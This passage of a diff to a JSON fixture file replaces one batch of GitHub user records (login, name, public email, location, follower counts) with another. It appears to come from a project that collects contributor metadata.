"https://avatars.githubusercontent.com/u/2872241?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4378558?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2012-11-23T14:55:39Z", - "updated_at": "2024-09-11T18:56:22Z", - "node_id": "MDQ6VXNlcjI4NzIyNDE=", + "public_repositories_count": 1, + "created_at": "2013-05-08T15:46:52Z", + "updated_at": "2023-09-01T08:56:42Z", + "node_id": "MDQ6VXNlcjQzNzg1NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425128,24 +684652,24 @@ }, { "model": "github.user", - "pk": 2596, + "pk": 7950, "fields": { - "nest_created_at": "2024-09-12T01:35:05.812Z", - "nest_updated_at": "2024-09-12T01:35:05.812Z", + "nest_created_at": "2024-09-22T09:38:00.848Z", + "nest_updated_at": "2024-09-22T19:37:02.774Z", "name": "", - "login": "ckazimie", + "login": "jamesandres", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/762436?v=4", - "company": "DXC.technology", - "location": "Copenhagen", + "avatar_url": "https://avatars.githubusercontent.com/u/392214?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2011-05-01T21:41:37Z", - "updated_at": "2024-07-07T08:48:50Z", - "node_id": "MDQ6VXNlcjc2MjQzNg==", + "following_count": 1, + "followers_count": 9, + "public_gists_count": 1, + "public_repositories_count": 37, + "created_at": "2010-09-08T15:36:22Z", + "updated_at": "2024-09-03T12:59:10Z", + "node_id": "MDQ6VXNlcjM5MjIxNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425153,24 +684677,24 @@ }, { "model": "github.user", - "pk": 2597, + "pk": 7951, "fields": { - "nest_created_at": "2024-09-12T01:35:09.175Z", - "nest_updated_at": "2024-09-12T01:35:09.175Z", - "name": "Jörg Kubitz", - "login": "jukzi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/51790620?v=4", - "company": "ssi", - "location": "Germany", + "nest_created_at": "2024-09-22T09:38:01.170Z", + "nest_updated_at": "2024-09-22T19:37:03.084Z", + "name": "Jian Dai", + "login": "daimon99", + "email": "daijian1@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/10393473?v=4", + "company": "", + "location": "Beijing", "collaborators_count": 0, - "following_count": 1, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2019-06-13T13:50:27Z", - "updated_at": "2024-08-12T07:20:51Z", - "node_id": "MDQ6VXNlcjUxNzkwNjIw", + "following_count": 42, + "followers_count": 13, + "public_gists_count": 36, + "public_repositories_count": 143, + "created_at": "2015-01-04T22:41:00Z", + "updated_at": "2024-03-31T08:33:07Z", + "node_id": "MDQ6VXNlcjEwMzkzNDcz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425178,99 +684702,99 @@ }, { "model": "github.user", - "pk": 2598, + "pk": 7952, "fields": { - "nest_created_at": "2024-09-12T01:35:10.819Z", - "nest_updated_at": "2024-09-12T01:35:10.819Z", - "name": "Pasha Radchenko", - "login": "ep4sh", + "nest_created_at": "2024-09-22T09:38:01.496Z", + "nest_updated_at": "2024-09-22T19:37:03.399Z", + "name": "Serj S.", + "login": "ar0ne", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19505042?v=4", - "company": "RXLab", + "avatar_url": "https://avatars.githubusercontent.com/u/3996860?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 9, - "public_gists_count": 30, - "public_repositories_count": 22, - "created_at": "2016-05-21T12:59:45Z", - "updated_at": "2024-09-05T11:37:34Z", - "node_id": "MDQ6VXNlcjE5NTA1MDQy", - "bio": "PLUS ULTRA", - "is_hireable": false, + "following_count": 47, + "followers_count": 19, + "public_gists_count": 3, + "public_repositories_count": 63, + "created_at": "2013-03-28T14:32:45Z", + "updated_at": "2024-09-20T11:29:06Z", + "node_id": "MDQ6VXNlcjM5OTY4NjA=", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2599, + "pk": 7953, "fields": { - "nest_created_at": "2024-09-12T01:35:14.142Z", - "nest_updated_at": "2024-09-12T01:35:14.142Z", - "name": "Leonid Bugaev", - "login": "buger", - "email": "leonsbox@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/14009?v=4", - "company": "Tyk.io", - "location": "Istanbul", + "nest_created_at": "2024-09-22T09:38:01.804Z", + "nest_updated_at": "2024-09-22T19:37:03.710Z", + "name": "Thijs Boehme", + "login": "ThijsBoehme", + "email": "thijsboehme@me.com", + "avatar_url": "https://avatars.githubusercontent.com/u/12415682?v=4", + "company": "Qmino", + "location": "Belgium", "collaborators_count": 0, - "following_count": 28, - "followers_count": 3079, - "public_gists_count": 50, - "public_repositories_count": 135, - "created_at": "2008-06-17T07:35:50Z", - "updated_at": "2024-08-06T16:47:55Z", - "node_id": "MDQ6VXNlcjE0MDA5", - "bio": "👉 👉 👉 👉 👉 👉 👉 👉 👉 👉 👉 ", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2015-05-12T17:26:30Z", + "updated_at": "2024-08-16T17:35:31Z", + "node_id": "MDQ6VXNlcjEyNDE1Njgy", + "bio": "", "is_hireable": false, - "twitter_username": "buger" + "twitter_username": "ThijsBoehme" } }, { "model": "github.user", - "pk": 2600, + "pk": 7954, "fields": { - "nest_created_at": "2024-09-12T01:35:16.216Z", - "nest_updated_at": "2024-09-12T01:38:59.560Z", - "name": "Michael Macnair", - "login": "mykter", - "email": "git@mykter.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1424497?v=4", + "nest_created_at": "2024-09-22T09:38:02.174Z", + "nest_updated_at": "2024-09-22T19:37:04.022Z", + "name": "Werner Pieterson", + "login": "wernerhp", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2578772?v=4", "company": "", - "location": "UK", + "location": "Pretoria, South Africa", "collaborators_count": 0, - "following_count": 0, - "followers_count": 46, - "public_gists_count": 5, - "public_repositories_count": 30, - "created_at": "2012-02-09T21:55:36Z", - "updated_at": "2024-09-09T06:42:47Z", - "node_id": "MDQ6VXNlcjE0MjQ0OTc=", + "following_count": 24, + "followers_count": 45, + "public_gists_count": 7, + "public_repositories_count": 58, + "created_at": "2012-10-17T07:17:12Z", + "updated_at": "2024-09-09T05:59:58Z", + "node_id": "MDQ6VXNlcjI1Nzg3NzI=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2601, + "pk": 7955, "fields": { - "nest_created_at": "2024-09-12T01:35:17.925Z", - "nest_updated_at": "2024-09-12T01:36:40.608Z", - "name": "", - "login": "troy256", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/48829375?v=4", + "nest_created_at": "2024-09-22T09:38:02.495Z", + "nest_updated_at": "2024-09-22T19:37:04.337Z", + "name": "Artem", + "login": "atten", + "email": "art@force.fm", + "avatar_url": "https://avatars.githubusercontent.com/u/2737960?v=4", "company": "", - "location": "", + "location": "Moscow", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2019-03-22T12:18:09Z", - "updated_at": "2024-09-05T10:57:22Z", - "node_id": "MDQ6VXNlcjQ4ODI5Mzc1", + "following_count": 4, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 18, + "created_at": "2012-11-06T20:22:47Z", + "updated_at": "2024-09-11T06:22:31Z", + "node_id": "MDQ6VXNlcjI3Mzc5NjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425278,74 +684802,74 @@ }, { "model": "github.user", - "pk": 2602, + "pk": 7956, "fields": { - "nest_created_at": "2024-09-12T01:35:19.575Z", - "nest_updated_at": "2024-09-12T01:35:19.575Z", - "name": "Nedeljko Ned Scepanovic", - "login": "zeenmc", + "nest_created_at": "2024-09-22T09:38:02.815Z", + "nest_updated_at": "2024-09-22T19:37:04.650Z", + "name": "Chihiro Kaneko", + "login": "hirokinko", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63357450?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1361739?v=4", "company": "", - "location": "Belgrade, Serbia", + "location": "", "collaborators_count": 0, - "following_count": 12, - "followers_count": 16, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2020-04-08T14:28:10Z", - "updated_at": "2024-08-11T20:11:51Z", - "node_id": "MDQ6VXNlcjYzMzU3NDUw", - "bio": "DevOps engineer with experience in ISP environment. ", - "is_hireable": true, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2012-01-21T03:37:14Z", + "updated_at": "2024-09-21T05:01:22Z", + "node_id": "MDQ6VXNlcjEzNjE3Mzk=", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2603, + "pk": 7957, "fields": { - "nest_created_at": "2024-09-12T01:35:25.407Z", - "nest_updated_at": "2024-09-13T05:08:07.752Z", - "name": "Harsha Bachina", - "login": "hvardhan20", - "email": "hvardhan20@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6909215?v=4", + "nest_created_at": "2024-09-22T09:38:03.133Z", + "nest_updated_at": "2024-09-22T19:37:04.994Z", + "name": "makoto tsuyuki", + "login": "tsuyukimakoto", + "email": "mtsuyuki@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/238824?v=4", "company": "", - "location": "USA", + "location": "Kamakura, Japan.", "collaborators_count": 0, - "following_count": 33, - "followers_count": 8, - "public_gists_count": 0, - "public_repositories_count": 29, - "created_at": "2014-03-10T16:04:11Z", - "updated_at": "2024-06-24T05:19:52Z", - "node_id": "MDQ6VXNlcjY5MDkyMTU=", - "bio": "enthusiast of all things software, systems & matrix", - "is_hireable": true, - "twitter_username": "" + "following_count": 5, + "followers_count": 30, + "public_gists_count": 37, + "public_repositories_count": 82, + "created_at": "2010-04-07T15:01:36Z", + "updated_at": "2024-09-15T07:53:14Z", + "node_id": "MDQ6VXNlcjIzODgyNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "everes" } }, { "model": "github.user", - "pk": 2604, + "pk": 7958, "fields": { - "nest_created_at": "2024-09-12T01:35:26.714Z", - "nest_updated_at": "2024-09-12T01:35:26.714Z", - "name": "Jan Werner", - "login": "janjwerner-confluent", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/105367074?v=4", + "nest_created_at": "2024-09-22T09:38:07.024Z", + "nest_updated_at": "2024-09-22T19:37:08.902Z", + "name": "Julien Fache", + "login": "Fantomas42", + "email": "fantomas42@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/100376?v=4", "company": "", - "location": "", + "location": "Paris, France", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 7, + "followers_count": 225, "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2022-05-11T13:10:29Z", - "updated_at": "2024-07-22T15:16:12Z", - "node_id": "U_kgDOBkfGIg", + "public_repositories_count": 26, + "created_at": "2009-06-30T15:44:10Z", + "updated_at": "2024-09-20T18:26:45Z", + "node_id": "MDQ6VXNlcjEwMDM3Ng==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425353,149 +684877,149 @@ }, { "model": "github.user", - "pk": 2605, + "pk": 7959, "fields": { - "nest_created_at": "2024-09-12T01:35:28.783Z", - "nest_updated_at": "2024-09-12T01:35:28.783Z", - "name": "Nicklas Körtge", - "login": "n1ckl0sk0rtge", - "email": "nicklas.koertge@protonmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/25745329?v=4", + "nest_created_at": "2024-09-22T09:38:07.344Z", + "nest_updated_at": "2024-09-22T19:37:09.250Z", + "name": "Jonny Buchanan", + "login": "insin", + "email": "jonathan.buchanan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/226692?v=4", "company": "", - "location": "", + "location": "Brisbane, Australia", "collaborators_count": 0, - "following_count": 5, - "followers_count": 6, - "public_gists_count": 9, - "public_repositories_count": 15, - "created_at": "2017-02-13T13:57:34Z", - "updated_at": "2024-09-08T12:24:23Z", - "node_id": "MDQ6VXNlcjI1NzQ1MzI5", - "bio": "Researcher and Software Engineer with focus on Quantum Safe and Security", + "following_count": 507, + "followers_count": 931, + "public_gists_count": 206, + "public_repositories_count": 133, + "created_at": "2010-03-20T09:16:33Z", + "updated_at": "2024-06-08T06:32:25Z", + "node_id": "MDQ6VXNlcjIyNjY5Mg==", + "bio": "Programmer/web developer from Northern Ireland living in Australia, making things with JavaScript and Flutter, including Control Panel for Twitter", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jbscript" } }, { "model": "github.user", - "pk": 2606, + "pk": 7960, "fields": { - "nest_created_at": "2024-09-12T01:35:30.934Z", - "nest_updated_at": "2024-09-16T22:28:50.247Z", - "name": "Freddi", - "login": "freddiN", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/14030572?v=4", + "nest_created_at": "2024-09-22T09:38:07.661Z", + "nest_updated_at": "2024-09-22T19:37:09.559Z", + "name": "Brian Rosner", + "login": "brosner", + "email": "brosner@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/124?v=4", "company": "", - "location": "Germany", + "location": "Denver, CO", "collaborators_count": 0, - "following_count": 3, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 17, - "created_at": "2015-08-29T14:33:52Z", - "updated_at": "2024-09-04T11:34:40Z", - "node_id": "MDQ6VXNlcjE0MDMwNTcy", - "bio": "", + "following_count": 111, + "followers_count": 971, + "public_gists_count": 22, + "public_repositories_count": 115, + "created_at": "2008-02-02T19:03:54Z", + "updated_at": "2024-07-15T20:55:58Z", + "node_id": "MDQ6VXNlcjEyNA==", + "bio": "Staff Software Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2607, + "pk": 7961, "fields": { - "nest_created_at": "2024-09-12T01:35:32.616Z", - "nest_updated_at": "2024-09-12T01:35:32.616Z", - "name": "Elifarley C.", - "login": "elifarley", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/519940?v=4", + "nest_created_at": "2024-09-22T09:38:07.974Z", + "nest_updated_at": "2024-09-22T19:37:09.870Z", + "name": "Doug Napoleone", + "login": "dougn", + "email": "doug.napoleone@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/68801?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 71, - "followers_count": 47, - "public_gists_count": 20, - "public_repositories_count": 97, - "created_at": "2010-12-12T13:52:56Z", - "updated_at": "2024-09-04T23:03:15Z", - "node_id": "MDQ6VXNlcjUxOTk0MA==", + "following_count": 0, + "followers_count": 14, + "public_gists_count": 11, + "public_repositories_count": 22, + "created_at": "2009-03-31T03:21:04Z", + "updated_at": "2023-10-16T15:45:34Z", + "node_id": "MDQ6VXNlcjY4ODAx", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2608, + "pk": 7962, "fields": { - "nest_created_at": "2024-09-12T01:35:38.904Z", - "nest_updated_at": "2024-09-12T01:35:38.904Z", - "name": "Gregor Latuske", - "login": "glatuske", + "nest_created_at": "2024-09-22T09:38:08.289Z", + "nest_updated_at": "2024-09-22T19:37:10.182Z", + "name": "Jeff Triplett", + "login": "jefftriplett", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5259942?v=4", - "company": "ETAS GmbH", - "location": "Kornwestheim, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/50527?v=4", + "company": "@revsys @DEFNA @djangocon @psf @django ", + "location": "Lawrence, KS", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2013-08-19T08:39:22Z", - "updated_at": "2024-09-05T15:17:59Z", - "node_id": "MDQ6VXNlcjUyNTk5NDI=", - "bio": "", + "following_count": 317, + "followers_count": 947, + "public_gists_count": 148, + "public_repositories_count": 233, + "created_at": "2009-01-30T17:42:25Z", + "updated_at": "2024-07-29T20:07:05Z", + "node_id": "MDQ6VXNlcjUwNTI3", + "bio": "@revsys @DEFNA @django @djangocon @psf 🏀 ✨ 💪 🏃 Oh Mai", "is_hireable": false, - "twitter_username": "" + "twitter_username": "webology" } }, { "model": "github.user", - "pk": 2609, + "pk": 7963, "fields": { - "nest_created_at": "2024-09-12T01:35:48.070Z", - "nest_updated_at": "2024-09-12T01:35:48.070Z", - "name": "Xavier Calland", - "login": "xavier-calland", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1773123?v=4", - "company": "@atolcd ", - "location": "", + "nest_created_at": "2024-09-22T09:38:08.605Z", + "nest_updated_at": "2024-09-22T19:37:10.508Z", + "name": "Alexander Clausen", + "login": "sk1p", + "email": "alex@gc-web.de", + "avatar_url": "https://avatars.githubusercontent.com/u/5778?v=4", + "company": "", + "location": "Jülich, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 4, - "public_gists_count": 2, - "public_repositories_count": 6, - "created_at": "2012-05-24T07:38:19Z", - "updated_at": "2024-08-20T15:57:33Z", - "node_id": "MDQ6VXNlcjE3NzMxMjM=", - "bio": "", + "following_count": 78, + "followers_count": 53, + "public_gists_count": 3, + "public_repositories_count": 76, + "created_at": "2008-04-08T06:31:15Z", + "updated_at": "2024-09-17T08:16:31Z", + "node_id": "MDQ6VXNlcjU3Nzg=", + "bio": "Lead software engineer of LiberTEM", "is_hireable": false, - "twitter_username": "xcalland" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2610, + "pk": 7964, "fields": { - "nest_created_at": "2024-09-12T01:35:49.785Z", - "nest_updated_at": "2024-09-16T22:29:29.504Z", + "nest_created_at": "2024-09-22T09:38:09.551Z", + "nest_updated_at": "2024-09-22T19:37:11.528Z", "name": "", - "login": "somera", + "login": "drprofesq", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8334250?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5618114?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 465, - "followers_count": 34, - "public_gists_count": 14, - "public_repositories_count": 11, - "created_at": "2014-08-01T23:09:50Z", - "updated_at": "2023-11-07T14:28:14Z", - "node_id": "MDQ6VXNlcjgzMzQyNTA=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-10-05T15:08:06Z", + "updated_at": "2023-07-05T17:25:35Z", + "node_id": "MDQ6VXNlcjU2MTgxMTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425503,49 +685027,49 @@ }, { "model": "github.user", - "pk": 2611, + "pk": 7965, "fields": { - "nest_created_at": "2024-09-12T01:35:52.660Z", - "nest_updated_at": "2024-09-12T01:37:36.162Z", - "name": "Surendra Pathak", - "login": "surendrapathak", - "email": "surendra.pathak@interlynk.io", - "avatar_url": "https://avatars.githubusercontent.com/u/1686327?v=4", - "company": "@interlynk-io ", - "location": "San Francisco, CA", + "nest_created_at": "2024-09-22T09:38:09.866Z", + "nest_updated_at": "2024-09-22T19:37:11.844Z", + "name": "Devin Carlen", + "login": "devcamcar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/118134?v=4", + "company": "", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 20, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 14, - "created_at": "2012-04-27T20:10:20Z", - "updated_at": "2024-09-12T00:10:38Z", - "node_id": "MDQ6VXNlcjE2ODYzMjc=", + "following_count": 21, + "followers_count": 30, + "public_gists_count": 22, + "public_repositories_count": 75, + "created_at": "2009-08-22T01:23:29Z", + "updated_at": "2024-04-19T16:54:11Z", + "node_id": "MDQ6VXNlcjExODEzNA==", "bio": "", - "is_hireable": true, - "twitter_username": "interlynksp" + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 2612, + "pk": 7966, "fields": { - "nest_created_at": "2024-09-12T01:35:53.974Z", - "nest_updated_at": "2024-09-12T01:35:53.974Z", - "name": "", - "login": "komaldadore-TU", - "email": "komal.dadore@taskus.com", - "avatar_url": "https://avatars.githubusercontent.com/u/118332577?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T09:38:10.187Z", + "nest_updated_at": "2024-09-22T19:37:12.197Z", + "name": "Jacob Kaplan-Moss", + "login": "jacobian", + "email": "jacob@jacobian.org", + "avatar_url": "https://avatars.githubusercontent.com/u/21148?v=4", + "company": "Latacora", + "location": "Oregon", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-11-16T05:20:08Z", - "updated_at": "2023-10-12T07:19:05Z", - "node_id": "U_kgDOBw2coQ", + "following_count": 25, + "followers_count": 2922, + "public_gists_count": 139, + "public_repositories_count": 64, + "created_at": "2008-08-19T15:20:56Z", + "updated_at": "2024-07-11T14:02:39Z", + "node_id": "MDQ6VXNlcjIxMTQ4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425553,74 +685077,74 @@ }, { "model": "github.user", - "pk": 2613, + "pk": 7967, "fields": { - "nest_created_at": "2024-09-12T01:35:55.676Z", - "nest_updated_at": "2024-09-12T01:35:55.676Z", - "name": "Ash Allen", - "login": "aja08379", + "nest_created_at": "2024-09-22T09:38:10.508Z", + "nest_updated_at": "2024-09-22T19:37:12.506Z", + "name": "", + "login": "JocelynDelalande", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/60787692?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/429633?v=4", "company": "", - "location": "", + "location": "Internets", "collaborators_count": 0, - "following_count": 7, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-02-07T15:36:03Z", - "updated_at": "2024-07-24T14:48:05Z", - "node_id": "MDQ6VXNlcjYwNzg3Njky", + "following_count": 2, + "followers_count": 26, + "public_gists_count": 1, + "public_repositories_count": 124, + "created_at": "2010-10-06T14:08:25Z", + "updated_at": "2024-04-02T12:42:40Z", + "node_id": "MDQ6VXNlcjQyOTYzMw==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2614, + "pk": 7968, "fields": { - "nest_created_at": "2024-09-12T01:36:00.279Z", - "nest_updated_at": "2024-09-16T22:28:53.015Z", - "name": "Matthew Trees", - "login": "javaface", + "nest_created_at": "2024-09-22T09:38:10.831Z", + "nest_updated_at": "2024-09-22T19:37:12.818Z", + "name": "Stephen Paulger", + "login": "stephenpaulger", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5598089?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/187240?v=4", "company": "", - "location": "", + "location": "Cambridge, UK", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2013-10-02T20:00:35Z", - "updated_at": "2024-04-09T15:33:13Z", - "node_id": "MDQ6VXNlcjU1OTgwODk=", - "bio": "This is my personal GitHub account.", + "following_count": 35, + "followers_count": 35, + "public_gists_count": 7, + "public_repositories_count": 30, + "created_at": "2010-01-21T22:01:29Z", + "updated_at": "2024-09-09T19:43:14Z", + "node_id": "MDQ6VXNlcjE4NzI0MA==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2615, + "pk": 7969, "fields": { - "nest_created_at": "2024-09-12T01:36:03.639Z", - "nest_updated_at": "2024-09-12T01:36:03.639Z", - "name": "Hugh", - "login": "wujunhuge", + "nest_created_at": "2024-09-22T09:38:11.160Z", + "nest_updated_at": "2024-09-22T19:37:13.128Z", + "name": "Vinay Karanam", + "login": "vinayinvicible", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/108388033?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8069666?v=4", + "company": "Coverfox", + "location": "India", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 18, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-06-29T05:55:15Z", - "updated_at": "2024-07-05T02:43:44Z", - "node_id": "U_kgDOBnXewQ", + "public_repositories_count": 6, + "created_at": "2014-07-04T15:59:23Z", + "updated_at": "2024-09-05T05:42:39Z", + "node_id": "MDQ6VXNlcjgwNjk2NjY=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425628,49 +685152,49 @@ }, { "model": "github.user", - "pk": 2616, + "pk": 7970, "fields": { - "nest_created_at": "2024-09-12T01:36:05.302Z", - "nest_updated_at": "2024-09-12T01:36:05.302Z", - "name": "Youssef Bel Mekki", - "login": "ybelMekk", + "nest_created_at": "2024-09-22T09:38:11.480Z", + "nest_updated_at": "2024-09-22T19:37:13.449Z", + "name": "Kevin Roche", + "login": "kevinroche", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/38552193?v=4", - "company": "@nais, @navikt", - "location": "Oslo", + "avatar_url": "https://avatars.githubusercontent.com/u/627387?v=4", + "company": "Wellthy", + "location": "New York, NY", "collaborators_count": 0, - "following_count": 7, - "followers_count": 9, + "following_count": 6, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2018-04-20T06:46:02Z", - "updated_at": "2024-08-05T08:28:32Z", - "node_id": "MDQ6VXNlcjM4NTUyMTkz", - "bio": "Devops / Programmer.", + "public_repositories_count": 5, + "created_at": "2011-02-19T19:11:29Z", + "updated_at": "2024-05-31T18:19:42Z", + "node_id": "MDQ6VXNlcjYyNzM4Nw==", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2617, + "pk": 7971, "fields": { - "nest_created_at": "2024-09-12T01:36:06.521Z", - "nest_updated_at": "2024-09-12T01:36:06.521Z", - "name": "Tom Kuipers", - "login": "tomkuipers", + "nest_created_at": "2024-09-22T09:38:11.789Z", + "nest_updated_at": "2024-09-22T19:37:13.758Z", + "name": "", + "login": "rodolfojcj", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/701208?v=4", - "company": "Universiteit van Amsterdam", - "location": "Amsterdam", + "avatar_url": "https://avatars.githubusercontent.com/u/458749?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 37, - "created_at": "2011-03-31T09:28:21Z", - "updated_at": "2024-06-19T10:23:16Z", - "node_id": "MDQ6VXNlcjcwMTIwOA==", + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2010-10-28T22:23:57Z", + "updated_at": "2024-06-24T23:00:08Z", + "node_id": "MDQ6VXNlcjQ1ODc0OQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425678,49 +685202,49 @@ }, { "model": "github.user", - "pk": 2618, + "pk": 7972, "fields": { - "nest_created_at": "2024-09-12T01:36:14.441Z", - "nest_updated_at": "2024-09-12T02:09:47.662Z", - "name": "Steffen Müller (HG)", - "login": "muellerst-hg", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/113037816?v=4", - "company": "@Haufe-Lexware", - "location": "", + "nest_created_at": "2024-09-22T09:38:15.655Z", + "nest_updated_at": "2024-09-22T19:37:17.624Z", + "name": "Jonathan Liuti", + "login": "johnraz", + "email": "liuti.john@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/304164?v=4", + "company": "", + "location": "Belgium", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-09-07T13:54:01Z", - "updated_at": "2024-09-04T12:29:10Z", - "node_id": "U_kgDOBrzR-A", - "bio": "DevOps Engineer", - "is_hireable": false, + "following_count": 9, + "followers_count": 29, + "public_gists_count": 1, + "public_repositories_count": 87, + "created_at": "2010-06-13T15:08:27Z", + "updated_at": "2024-09-21T07:21:53Z", + "node_id": "MDQ6VXNlcjMwNDE2NA==", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2619, + "pk": 7973, "fields": { - "nest_created_at": "2024-09-12T01:36:16.109Z", - "nest_updated_at": "2024-09-18T19:07:20.524Z", - "name": "Lukas Braune", - "login": "lukas-braune", + "nest_created_at": "2024-09-22T09:38:15.984Z", + "nest_updated_at": "2024-09-22T19:37:17.956Z", + "name": "Josh Bothun", + "login": "minism", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/9955029?v=4", - "company": "@Rohde-Schwarz", - "location": "Munich, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/1164167?v=4", + "company": "", + "location": "Oregon", "collaborators_count": 0, - "following_count": 24, - "followers_count": 15, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2014-11-25T23:55:57Z", - "updated_at": "2024-08-19T08:56:46Z", - "node_id": "MDQ6VXNlcjk5NTUwMjk=", + "following_count": 12, + "followers_count": 34, + "public_gists_count": 21, + "public_repositories_count": 64, + "created_at": "2011-11-01T05:27:24Z", + "updated_at": "2024-09-15T18:50:52Z", + "node_id": "MDQ6VXNlcjExNjQxNjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -425728,24 +685252,24 @@ }, { "model": "github.user", - "pk": 2620, + "pk": 7974, "fields": { - "nest_created_at": "2024-09-12T01:36:17.430Z", - "nest_updated_at": "2024-09-12T01:36:17.430Z", - "name": "", - "login": "apsdts", + "nest_created_at": "2024-09-22T09:38:16.294Z", + "nest_updated_at": "2024-09-22T19:37:18.270Z", + "name": "Kyle Rimkus", + "login": "krimkus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/116338814?v=4", + "avatar_url": 